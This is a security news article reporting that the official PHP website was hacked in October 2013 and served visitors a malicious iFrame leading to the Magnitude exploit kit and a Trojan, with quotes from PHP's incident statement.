Official PHP website hacked, spreads malware infection

Graham Cluley
Graham Cluley
@[email protected]

The website, the official home of the open-source PHP programming language, has been hacked and used to spread malware to visitors.

The first indication that many users will have had that anything was wrong was when Google’s Safe Browsing service began to pop-up an alert indicating that it had found the site was serving up malicious scripts, as was reported on Thursday by Softpedia.

Google Safe Browsing alert on Source: Softpedia

Initially, many people’s reaction was that the warning was likely to be a false positive. However, a statement on has now confirmed that malware was being spread from the site from Tuesday 22 October until the 24th.

Sign up to our free newsletter.
Security news, advice, and tips.

PHP statement about malware infection

Part of the statement reads:

To summarise, the situation right now is that:

* JavaScript malware was served to a small percentage of users from the 22nd to the 24th of October 2013.
* Neither the source tarball downloads nor the Git repository were modified or compromised.
* Two servers were compromised, and have been removed from service. All services have been migrated to new, secure servers.
* SSL access to Web sites is temporarily unavailable until a new SSL certificate is issued and installed on the servers that need it.

Kaspersky security researcher Fabio Assolini confirmed the infection, saying that hackers had managed to inject a malicious iFrame into the website, pointing to the Magnitude exploit kit, which then – in turn – dropped the Tepfer Trojan horse onto visiting computers.

Infection Exploit kits like Magnitude attempt to turn vulnerabilities on computers to their advantage, exploiting security holes in the likes of Adobe Flash, Java, different internet browsers and other software – a major incentive to keep your patches up-to-date.

This doesn’t, of course, explain how the website managed to become compromised in the first place. Clearly something went badly wrong if the hackers were able to inject their malicious script into the site, causing every visitor to be silently targeted by the Magnitude exploit kit.

Of course, PHP is a development language used behind-the-scenes by many millions of websites across the net. Fortunately, there is no indication that any of the code maintained on the site was compromised.

The site says it will publish a full post mortem on the security incident in the near future, probably next week, and that users should follow @official_php on Twitter for updates.

Found this article interesting? Follow Graham Cluley on Twitter or Mastodon to read more of the exclusive content we post.

Graham Cluley is a veteran of the cybersecurity industry, having worked for a number of security companies since the early 1990s when he wrote the first ever version of Dr Solomon's Anti-Virus Toolkit for Windows. Now an independent analyst, he regularly makes media appearances and is an international public speaker on the topic of cybersecurity, hackers, and online privacy. Follow him on Twitter, Mastodon, Bluesky, or drop him an email.

What do you think? Leave a comment

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.